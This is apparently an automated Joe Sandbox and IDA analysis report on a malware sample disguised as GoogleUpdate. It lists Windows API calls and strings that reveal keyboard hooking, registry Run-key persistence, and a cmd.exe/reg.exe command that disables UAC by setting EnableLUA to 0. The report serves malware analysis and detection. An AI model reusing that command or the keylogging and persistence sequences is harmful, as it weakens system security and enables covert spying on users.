Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CreateEventLocalTime
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 2082726707-2151626615
Opcode ID: 61d33b4e7b12f4ff2c35ec2f77fa078576cbad09f03d7b01a313875f432ed892
Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
Opcode Fuzzy Hash: 61d33b4e7b12f4ff2c35ec2f77fa078576cbad09f03d7b01a313875f432ed892
Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

Function 00409340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
GetLastError.KERNEL32 ref: 00409375

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
TranslateMessage.USER32(?), ref: 004093D2
DispatchMessageA.USER32(?), ref: 004093DD

Strings

Keylogger initialization failure: error , xrefs: 00409389

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: cfd85c535bb0db94fb89dc6c4df829e687b8f2a6419d7d210f0f2ce5eeb3337a
Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
Opcode Fuzzy Hash: cfd85c535bb0db94fb89dc6c4df829e687b8f2a6419d7d210f0f2ce5eeb3337a
Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A

Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,00410C6A), ref: 00419F3B

Part of subcall function 00411F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
Part of subcall function 00411F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.KERNEL32(?), ref: 00411FDD

StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327

Strings

(32 bit), xrefs: 0041935A
(64 bit), xrefs: 00419353
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004192C2, 004192CC, 0041930D
CurrentBuildNumber, xrefs: 00419308
ProductName, xrefs: 004192BD

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 782494840-2070987746
Opcode ID: 5d6f7caedd091060e040371a73527f4b0984226e085eb11b2fed307dbaea5501
Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
Opcode Fuzzy Hash: 5d6f7caedd091060e040371a73527f4b0984226e085eb11b2fed307dbaea5501
Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54
keyboardthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
GetKeyboardLayout.USER32(00000000), ref: 004094AE
GetKeyState.USER32(00000010), ref: 004094B8
GetKeyboardState.USER32(?), ref: 004094C5
ToUnicodeEx.USER32(0000005B,0000005B,?,?,00000010,00000000,00000000), ref: 004094E1

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: fb31a49d7b713d020a20d08ecca38714848a3f936d0bc64d24338e42dde13448
Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
Opcode Fuzzy Hash: fb31a49d7b713d020a20d08ecca38714848a3f936d0bc64d24338e42dde13448
Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4

Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
C:\Windows\System32\cmd.exe, xrefs: 0040E542

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 0b970088cbc172ce3b0f8ed072908de03e6d7713b03aec3cda7e5915f8f0f445
Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
Opcode Fuzzy Hash: 0b970088cbc172ce3b0f8ed072908de03e6d7713b03aec3cda7e5915f8f0f445
Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5

Function 004120E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,0gj), ref: 00412104
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000410,?), ref: 0041211D
RegCloseKey.KERNEL32(00000000), ref: 00412128

Strings

exepath, xrefs: 004120E8
0gj, xrefs: 004120F4

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: 0gj$exepath
API String ID: 3677997916-2174403247
Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4

Function 00412204 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041220F
RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,?,?,00000001,00469654,0gj,exepath,00472248,?,?,004111FF), ref: 0041223E
RegCloseKey.KERNEL32(?,?,?,00000001,00469654,0gj,exepath,00472248,?,?,004111FF,?,00000000), ref: 00412249

Strings

0gj, xrefs: 00412204
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041220D

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: 0gj$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 1818849710-3317721874
Opcode ID: 9a02877a10190b6426cbfd8bde816d16f795bd4c81ace352a3103f59058ff894
Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
Opcode Fuzzy Hash: 9a02877a10190b6426cbfd8bde816d16f795bd4c81ace352a3103f59058ff894
Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94

Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,004098DF,?,00000000,00000000), ref: 0041A1D7
CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A1E3
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004098DF,?,00000000,00000000), ref: 0041A1F4
CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A201

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B

Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Strings

Offline Keylogger Started, xrefs: 00409228, 0040922F, 0040925C

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 6be413687ec7e6cf8a6aae081c0db350f6bf135ed0b5d0c64268afb77a753199
Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
Opcode Fuzzy Hash: 6be413687ec7e6cf8a6aae081c0db350f6bf135ed0b5d0c64268afb77a753199
Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF

Function 00411F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00411F54
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
RegCloseKey.KERNEL32(?), ref: 00411F7D

Strings

pth_unenc, xrefs: 00411F34

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: pth_unenc
API String ID: 3677997916-4028850238
Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94

Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004120E8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,0gj), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000410,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.KERNEL32(00000000), ref: 00412128

Sleep.KERNEL32(00000BB8), ref: 004111DF

Strings

exepath, xrefs: 00411168, 004111A8, 00411229
H"G, xrefs: 00411163
0gj, xrefs: 00411155

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: 0gj$H"G$exepath
API String ID: 4119054056-2016326341
Opcode ID: 4d79a96d07bca113a25038c1cd8dde356977a82d44cbfaf5a453a5d21e194478
Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
Opcode Fuzzy Hash: 4d79a96d07bca113a25038c1cd8dde356977a82d44cbfaf5a453a5d21e194478
Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD

Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
GetFileSize.KERNEL32(00000000,00000000), ref: 0041A23C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041A261
CloseHandle.KERNEL32(00000000), ref: 0041A26F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f1251b9d043b1816c7bddaf3ccd168bdb61cdb2151e11f70954b411bc85d9a2d
Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
Opcode Fuzzy Hash: f1251b9d043b1816c7bddaf3ccd168bdb61cdb2151e11f70954b411bc85d9a2d
Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536

Function 00411F91 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
RegCloseKey.KERNEL32(?), ref: 00411FDD

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 7a1544548b3f7c2bdbc79f0242f37fe977c23e2c99779a8425445d9686f74cb1
Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
Opcode Fuzzy Hash: 7a1544548b3f7c2bdbc79f0242f37fe977c23e2c99779a8425445d9686f74cb1
Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8

Function 0041215F Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
RegSetValueExA.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,00412385,?,00000000), ref: 00412196
RegCloseKey.ADVAPI32(00000000,?,?,00412385,?,00000000,?,?,?,?,0gj,00472248), ref: 004121A1

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: f22ae03cc73ffd9918ec88d2fef4797e03461f2c2f39713df9249136138d9c6b
Instruction ID: 4e2890e51e7d784523b6c6e9c9a916a8daaabc2f4381c7e0ff06ecafce147d70
Opcode Fuzzy Hash: f22ae03cc73ffd9918ec88d2fef4797e03461f2c2f39713df9249136138d9c6b
Instruction Fuzzy Hash: 5AF0F632100208BFCB00EFA0DD45DEE373CEF04751F104226BD09A61A2D7359E10DB94

Function 00412268 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412276
RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004,?,?,?,00410B8A,0046403C,00000000), ref: 00412291
RegCloseKey.KERNEL32(?,?,?,?,00410B8A,0046403C,00000000), ref: 0041229C

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8

Function 00408F1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00408F39

Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7

Strings

88i, xrefs: 00408F69

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CreateThread$_wcslen
String ID: 88i
API String ID: 1119755333-4140304445
Opcode ID: b8b574ec300864d8d5f0b61b564e6d8bf291a5e157000126fc34229c0f587ccd
Instruction ID: bde1965b6f08766bd400bb9d626b3f4fd5e121562736213e95ba31f4244dc5e2
Opcode Fuzzy Hash: b8b574ec300864d8d5f0b61b564e6d8bf291a5e157000126fc34229c0f587ccd
Instruction Fuzzy Hash: 86218F719040899ACB09FFB5DD528EE7BB5AE51308F00003FF941722E2DE785A49DA99

Function 00443649 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

Strings

P@, xrefs: 0044364B

Memory Dump Source

